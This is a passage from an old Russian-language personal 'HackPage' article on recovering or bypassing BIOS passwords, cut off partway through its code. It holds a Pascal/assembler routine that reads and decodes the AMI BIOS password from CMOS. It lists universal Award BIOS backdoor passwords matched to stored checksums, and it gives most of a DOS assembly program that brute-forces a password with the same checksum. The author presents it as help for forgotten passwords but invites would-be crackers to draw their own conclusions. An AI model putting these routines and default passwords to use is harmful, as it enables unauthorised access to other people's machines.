[My Home Page] [Contact information] [My Bookmark] [Music Page] [Articles] [HackPage] [Sign Guestbook] [My Public PGP Key]
|
|
|
[My Home Page] [Contact information] [My Bookmark] [Music Page] [Articles] [HackPage] [Sign Guestbook] [My Public PGP Key] |
|
Как узнать паpоль после загpузки?
в AMI bios'e:
type String6=string[6];
function GetAMIPassword; assembler;
asm
cld
les di,@Result
mov si,di
mov al,37h
out 70h,al
in al,71h
and al,0F0h
xor bx,bx
xchg bh,al
stosb
@M1:
mov al,bl
add al,38h
out 70h,al
in al,71h
or al,al
jz @Exit
mov ah,al
xor cl,cl
@M2:
test al,80h
jz @M3
test al,61h
jnp @M4
stc
@M4:
rcl al,1
jmp @M6
@M3:
test al,61h
jp @M5
stc
@M5:
rcl al,1
@M6:
inc cl
cmp al,bh
jne @M2
inc byte ptr es:[si]
mov byte ptr es:[di],cl
inc di
mov bh,ah
inc bl
cmp bl,6
jb @M1
@Exit:
end;
В AWARD bios'e:
В отличии от других разновидностей bios-ов, Award-bios хранит не пароль,
а его 2-байтовую контрольную сумму (кс) в cmos-e. Таким образом, обычно
существует большое количество паролей, "открывающих" машину. Но не это
главное.
В Award-bios-ах есть универсальная кс (укс). Если подобрать строку символов
(не более восьми) с той же кс, то можно заставить компьютер работать.
Разумеется, таких паролей для каждой укс существует достаточно много.
Любой из таких паролей можно назвать универсальным паролем (уп). Долгое
время в ходу были bios-ы только с одной укс (взятой, скорее всего, от
строки AWARD_SW), и было найдено несколько других уп, таких как j262,
j256, Syxz, lkwpeter, Wodj... Все эти пароли, как Вы поняли, имеют
одну и ту же кс.
Последнее время появились машины с другими укс, взятыми от каких-то
других строк или выдуманных "от балды". Видимо это связанно с
лицензированием (продажей) bios-а различным фирмам.
Но... алгоритм взятия кс от строки остался прежним и место укс в bios-е
то же самое. Пока мне известно 5 вариантов укс (2 байта по адресу
F000:EC60)
Итак, если там число 0x1EAA, то паролем может служить всем известная
комбинация AWARD_SW. Бывают также bios-ы, где по этому адресу стоят другие
числа. Для удобства по одному из вариантов уп (те, которые сгенерировала
моя программа) привожу в табличке:
0x0604 KDD
0x1EAA ZJAAADC
0xBEA2 ZAAADA
0xAAAA UAABBA
0xFEA3 ZBAAACA
(Я подбирал пароли только из латинских заглавных букв.) Конечно,
можно было бы поискать и более осмысленные сочетания символов, имеющих
те же кс, но это дело я готов предоставить Вам (надо написать
простенькую программу, запустить ее работать на ночь, а потом
просмотреть файл в несколько сот кил :-) Для справки: четырехбуквенных
паролей для 0x1EAA-модификации bios-ов существует 11656 штук,
если брать набор символов от '!' до 'z'. Пяти-, шести-, семи- и
восьмибуквенных наберется еще больше...
Резюме: В отличии от владельцев других моделей компьютеров, Вам не
придется развинчивать корпус и искать там перемычку, сбрасывающую
cmos или вытаскивать (или, что еще хуже - закорачивать) батарейку,
если Вы забыли свой пароль, даже если этот пароль поставлен и на вход
в setup и на загрузку. Попробуйте один из вышеприведенных, авось
подойдет. Не забудте придерживать клавишу shift. Резюме для потенциальных
взломщиков не пишу - догадаетесь сами :-)
; revision history:
; 17 April 1996 - Just started :-)
; 21 April 1996 - First public release
; 29 April 1996 - Minor changes
; 30 July 1996 - Added password for 0xAAAA chechsum
;tasm /ml /m9 /zn award_cr.asm
;tlink /t/x award_cr.obj
.MODEL Tiny,C
LOCALS
.CODE
org 100h
P386
GETCRC macro
xor bx,bx
xor ah,ah
mov bl,cl
or ch,ch
jz _ret0
mov al,ch
rol bx,2
add bx,ax
rol ecx,16
or cl,cl
jz _ret1
mov al,cl
rol bx,2
add bx,ax
or ch,ch
jz _ret1
mov al,ch
rol bx,2
add bx,ax
or dl,dl
jz _ret1
mov al,dl
rol bx,2
add bx,ax
or dh,dh
jz _ret1
mov al,dh
rol bx,2
add bx,ax
rol edx,16
or dl,dl
jz _ret2
mov al,dl
rol bx,2
add bx,ax
or dh,dh
jz _ret2
mov al,dh
rol bx,2
add bx,ax
_ret2:
rol edx,16
_ret1:
rol ecx,16
_ret0:
endm
start:
mov dx,offset msg
mov ah,9
int 21h
cld
mov ax,0F000h
mov es,ax
xor bx,bx
_loop:
mov di,bx
mov si,offset pattern
mov cx,18
rep cmpsw
jcxz _award
inc bx
cmp bx,0FFFFh-36
jne _loop
mov dx,offset badbios
mov ah,9
jmp _p
_award:
mov cx,es:[0EC60h]
mov ah,9
mov dx,offset m1eaa
cmp cx,01EAAh
je _p
mov dx,offset m0604
cmp cx,00604h
je _p
mov dx,offset mfea3
cmp cx,0FEA3h
je _p
mov dx,offset mbea2
cmp cx,0BEA2h
je _p
mov dx,offset maaaa
cmp cx,0AAAAh
je _p
mov word ptr _label+2,cx
xor ecx,ecx
xor edx,edx
mov cl,xlat[0]
rol ecx,16
_proc2:
rol edx,16
_proc1:
rol ecx,16
_proc:
GETCRC
_label:
dw 0FB81h,0
je _found
xor bx,bx
mov bl,cl
mov cl,xlat[bx]
cmp cl,'.'
jne _proc
mov cl,xlat[0]
mov bl,ch
mov ch,xlat[bx]
cmp ch,'.'
jne _proc
mov ch,cl
rol ecx,16
mov bl,cl
mov cl,xlat[bx]
cmp cl,'.'
jne _proc1
mov cl,xlat[0]
mov bl,ch
mov ch,xlat[bx]
cmp ch,'.'
jne _proc1
mov ch,cl
mov bl,dl
mov dl,xlat[bx]
cmp dl,'.'
jne _proc1
mov dl,xlat[0]
mov bl,dh
mov dh,xlat[bx]
cmp dh,'.'
jne _proc1
mov dh,dl
rol edx,16
mov bl,dl
mov dl,xlat[bx]
cmp dl,'.'
jne _proc2
mov dl,xlat[0]
mov bl,dh
mov dh,xlat[bx]
cmp dh,'.'
jne _proc2
_fail:
ret
_found:
push edx
mov ah,2
mov dl,cl
or dl,dl
jz _ok1
int 21h
mov dl,ch
or dl,dl
jz _ok1
int 21h
rol ecx,16
mov dl,cl
or dl,dl
jz _ok1
int 21h
mov dl,ch
or dl,dl
jz _ok1
int 21h
pop ecx
mov dl,cl
or dl,dl
jz _ok0
int 21h
mov dl,ch
or dl,dl
jz _ok0
int 21h
rol ecx,16
mov dl,cl
or dl,dl
jz _ok0
int 21h
mov dl,ch
or dl,dl
jz _ok0
_p:
int 21h
_ok0:
ret
_ok1:
pop eax
ret
msg db 'Resolving AWARD BIOS default passwords',13,10
db 'Version as of July 30 1996',13,10
db 'Copyleft Award Software :-)',13,10
db 'Co-authors: Alex Bachin |
